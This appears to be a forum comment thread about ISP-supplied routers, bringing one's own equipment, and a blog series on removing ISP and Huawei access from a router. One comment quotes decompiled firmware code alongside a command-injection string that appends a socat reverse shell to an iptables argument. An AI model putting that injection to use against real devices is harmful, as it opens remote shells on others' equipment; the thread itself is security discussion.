I have a fiber connection, which I connected directly to a Ubiquity router through a suitable SFP module. My ISP supplied the information on the fiber type and which VLAN ID's to setup for internet, TV and telephony.
This way I have my own equipment, that I control myself. The 'modem' [0] which my ISP supplied is still in its original, unopened box.
As a customer, I like it.
In other words, ISPs hate it because it forces them to actually do their jobs and be ISPs. The Internet itself is "a zoo of endpoints on a shared medium", and ISP stands for Internet Service Provider.
Which works out great for me. I can use OpenWRT with no hassle.
More to the point, I see the cable stuff as "ISP land" in that it's directly interfacing with their internal hardware, and so has to dance to their tune very directly, whereas Ethernet and TCP/IP are common, and so will obey my rules in my home. I don't expect my modem to perform adblocking, which is why my router does it, and I'm not going to be stupid and try to "uncap" my modem to get more speed, so I don't see a point to being able to provide my own cable modem. As long as I can own the router which provides the only path in and out of my LAN, I can do everything I'm capable of doing anyway, as far as I can see.
Other cable providers (e.g. Comcast) charge you a monthly fee (~$5-15) to rent their modem. Buying a modem gets cost effective pretty quickly.
I think this modem "uncapping" thing has mostly been an urban myth. Maybe there were some really early cable modem systems in the 90s where that would have been possible, but AFAIK with DOCSIS the speed is regulated by the CMTS [0], not the modems.
[0] https://en.wikipedia.org/wiki/Cable_modem_termination_system
Unfortunately I had no luck with that - my loose theory is that my EdgeRouter was doing a ping check to see if the IP was already taken before accepting the DHCP lease...
I was able to get "IP passthrough" mode working with the AT&T router though. The key hiccup was that the AT&T router had to be on a different subnet than my router's LAN subnet.
Also, if you didn't need so much bandwidth, is it possible to just order a basic 100Mb/10mb connection for a nominal fee of, say, 30Euro?
The speeds in the US aren't actually that bad, but you're basically forced to pay for everything: paid cable TV, equipment rental fees, etc, and your $40 plan ends up creeping towards $100 / month after the fees and taxes, with increases every year.
You can call your ISP with any arbitrary piece of non-branded random AliExpress $#@$ of a network eq. and they must walk you through configuring it? That does not make much sense to me.
I have never met someone who attempted to install their own cable modem. I do know that the cable modulation standard (DOCSIS) is wildly complicated, so even buying the right type of cable modem for your connection would be challenging. There may also be licensing issues involved that would prevent you from buying such modem completely.
So, I use a SFP module that it suitable for the wavelength and mode of my fiber connection, and plugged that in an Ubiquity Edgerouter. In case of my ISP I had to configure a VLAN on the external interface, as they use separate VLANs for internet, TV and telephony. Once you configure the VLAN, the router will receive an IP address over DHCP and you'll be online.
In my case, I have VZ Fios in the northeast US. Their termination point at my house has an RJ45 Ethernet connection. It goes directly to my pfSense router.
You think it is going to blow people's socks off that a router provided and controlled by an ISP is accessible by that same ISP? Huh?
The Huawei SSH key is a little strange, but depressingly common for network equipment, even big names like Cisco[0].
[0] https://tools.cisco.com/security/center/content/CiscoSecurit...
There’s an understandable reason for this: the isp’s staff aren’t necessarily any more competent than the isp’s customers (some are, but there are so many ISPs that I suspect they are now a small minority). So just at the isp wants to be able to reset your interface devices remotely, so will Huawei and Cisco support for the ISPs themselves.
I am not implying that “understandable” means “justified”
Even? By now Cisco having hardcoded credentials and glaring security fuckups is a meme.
You reckon? I don’t think they’d even be interested in hearing about it.
Where do you live and who is your local paper that leads you to believe they’d bother writing, let alone publishing, such a story?
For CenturyLink fiber I have two boxes:
Box A: the exterior fiber enters this box, the tech said it was a "translator"; and the port 4 ethernet on it goes to ...
Box B: the centurylink wireless router, which performs the PPoE with my credentials which were somehow hardwired because no one ever told me my username/password. I'm guesing TR-069? Then port 4 on this goes to ...
Box C: MY WRT1900AC, which then goes to other subnets for my cameras, lab, and office.
I figured Box B was redundant, but trying to remove it has been problematic.
For "Box B" you can use anything you wish as long as it supports PPPoE. Contact CenturyLink by phone or chat to tell them you need your PPP credentials, they'll have no trouble giving them to you. The only trick besides PPP is that CenturyLink usually uses a VLAN for customer equipment on their GPON, but that's pretty common with ethernet over ADSL as well so routers made for use with a DSL modem should have it in their UIs alongside the PPP info. Unfortunately most newer routers are made without this use case in mind so there may not be support, in which case you can always upgrade to something a little more configurable or use a computer as a router. You can ask the CSR for the VLAN ID but in every case I've seen it's 201.
I've done this a number of times and never had the CSR give me any trouble. They also don't seem to keep very good track of who has CL-owned CPE, I've ended up with "free" CenturyLink routers a couple of times because they fell through the cracks when switching to my own.
They make it very hard to use your own "Box B", but I've set this up twice now (most recently last week). Get the username and password from CenturyLink (the tech that installs the service has this, or call them). Then, google search "century link vlan 201 wan tag". The trick is you need a router that has this functionality, most basic consumer ones don't.
Unfortunately, even if you follow all directions and it still doesn't work troubleshooting is a nightmare, very little or no help from their customer support.
* router
* firewall
* NAT device
* modem
* switch
* access point
* DNS resolver
* DHCP server
And probably others I'm not thinking of :-)
This is not the case, certainly if you are referring to the router requirements. Last I looked, the rest of the IETF was also very cognizant of the distinction, as there has been wide anti-NAT sentiment in the IETF, trying to get people to move over to IPv6 etc.
Newer RFCs use different terms such as CPE (customer premises equipment) and AFTR (address family transition router)
Most folks have no idea how it works behind the scenes, which typically is a combination of NAT (IPv4), routing (IPv6), DHCP, DNS, UPnP, and more. So, it's just "the router".
My view: If it forwards IP between different networks, it's a router.
I'm pretty happy that my cable ISP is allowing this mode so I don't have to double-NAT in my setup.
My DMARC has a hot ethernet jack, and my firewall (PC running Linux) that I control is connected to that ethernet jack. No ISP shenanigans (other than what they can remotely do to configure the FIOS DMARC itself).
For those who also have TV service, it’s more complicated, since the STBs talk TCP/IP over MoCA for various services (I believe including the program guide and DVR functions). The Ubiquiti forums have lots of posts on people trying (and succeeding) to get their gear working with FiOS.
I think pfSense will be my next too.
"This is very invasive and unacceptable. It may seem necessary to apply security patches published by your ISP but the user should be able to disable it whenever she wants."
Legally, at least in countries where I've lived, the ISP still owns the router. This surprised me a bit when I first found out, but then I got used to the idea, but you should treat any ISP or telecom gear in your house as something that's "rented but still owned and controlled by someone else".
For example
iptables %s > %s 2>&1
iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
undefined4 FUN_004045a0(int param_1,int param_2)
{ int iVar1; int iVar2; char
pcVar3; char cVar4; code pcVar5; undefined auStack544 [256]; undefined auStack288 [260]; FUN_00412530(auStack544,0,0x100);
FUN_00412530(auStack288,0,0x100);
if (param_1 == 0) {
FUN_004122c0(auStack288,0x100,"iptables > %s 2>&1","/var/IptablesInfo");
}
else {
iVar1 = FUN_00412210(0x100);
if (iVar1 == 0) {
return 0x40010009;
}
cVar4 = '\0';
while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
if (cVar4 == '\0') {
FUN_004122c0(iVar1,0x100,0x412c84,iVar2);
}
else {
FUN_004122c0(iVar1,0x100,"%s %s",iVar1,iVar2);
}
cVar4 = cVar4 + '\x01';
param_2 = param_2 + 1;
}
FUN_004122c0(auStack288,0x100,"iptables %s > %s 2>&1",iVar1,"/var/IptablesInfo");
FUN_00412660(iVar1);
}
FUN_00412330(auStack288);
iVar1 = FUN_004123c0("/var/IptablesInfo",0x414f68);
if (iVar1 == 0) {
pcVar5 = FUN_004126e0;
pcVar3 = "Fail\r";
}
else {
while (iVar2 = FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {
FUN_004126b0(0x412c84,auStack544);
FUN_004121a0(0xd);
}
FUN_00412520(DAT_0042b010);
FUN_004123a0(iVar1);
pcVar5 = FUN_00412500;
pcVar3 = "/var/IptablesInfo";
}
(*pcVar5)(pcVar3);
return 0;Any ideas?
i am still confused by this code but to me it looks like this has been originally written in another language but maybe this is just what it looks like after de-compiling. seeing this function would likely be more interesting.
I'd bet for (1), but who knows.
I don't really trust ISP provided hardware / software now though.
Obviously I don't know specifics, but if this applies to any router which has multiple tiers of login then it could be a pretty serious problem. I suspect that might be true for routers designed specifically broadcast multiple networks (e.g. school or shared apartment-building routers)?
[0] https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F...
Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already...
And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already...
Summary from the end of Part 3:
"So we managed to change passwords for both ssh and telnet, gain access to Root user for the web interface, changed that password too. We changed ACS URL to ours and remove the IP restrictions. To put it simply, we cleaned up our router from our ISP. Good for our privacy."
"Still there is an authorized ssh key left in the firmware but for now it’s enough that we’re keeping the ISP out. Maybe in the future, we can repack the firmware with our configuration and keys and install it on the router. For now, take care!"
Some customers apparently have absolutely no access to their routers, not even to the web interface, and they can't use their own either. All reconfiguration must be done through the customer service portal or by phone. That means the carrier can change for every little thing, including changing the Wi-Fi config! I'm not sure if you can even bridge, but I guess not. Note that this does not affect all customers of that carrier, just a minority.
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
631/tcp open ipp
5000/tcp open upnp
7777/tcp open cbt
20005/tcp open btx
For a while I had my own OpenWRT router in place of the ISP one, but I think they got wise to it and blocked the MAC. I changed it to match the ISP router's MAC address, but it only worked for about 3 minutes before being blocked again.
The 20005 one may be some port that NetGear uses for its USB Printing, I've found some articles that mention it.
It also struck me that I hit it with nmap using the LAN IP, so perhaps these are only open within the network. I probably need to hit the external IP of the router to see what is externally open. ShieldsUP! didn't show anything unusual.[1]
EDIT: Disclosure of a vulnerability regarding port 20005[2], and Netgear confirming that it does affect my router[3], but should have been fixed. I assume the "fix" was fixing the buffer overflow vulnerability, rather than closing the port altogether.
[1] https://www.grc.com/x/ne.dll?bh0bkyd2
[2] https://www.kb.cert.org/vuls/id/177092/
[3] https://kb.netgear.com/28393/NETGEAR-Product-Vulnerability-A...
What about that precompiled .ssh/authorized_keys with user z00163152@HUAWEI-627FB9A3 mentioned in Part 3?
Any reason why a router firmware would permit root access to anyone at all? Definitely sounds like a backdoor to me.
How about this?: "You can use your own device and we provide all required information, but there will be no advanced support and you have to check for bugfixes yourself monthly."
... now that I wrote it, I see the answer: There is no way to enforce this, especially not reliably.
> Mirai then identifies vulnerable IoT devices using a table of more than 60 common factory default usernames and passwords
Taking control of the device is exactly the kind of thing that stops that attack.
[1] https://unix.stackexchange.com/questions/510947/how-can-i-ru...
Who knows indeed?!
I had thought it had something to with the ISP allocating the same static IP to multiple clients and blocking some common ports to prevent collisions (ended up using port 109.. something for SSH). Turns out it was more interesting!
In part 3 https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already... the author rights that a Huawei engineer has an authorized ssh key that would allow them to access your router.
Just Wow!
Fortunately some kind person leaked the admin password so that I could configure it to my liking.
Every other router, for 20 years now, had a slow and buggy web interface.
Why is this?!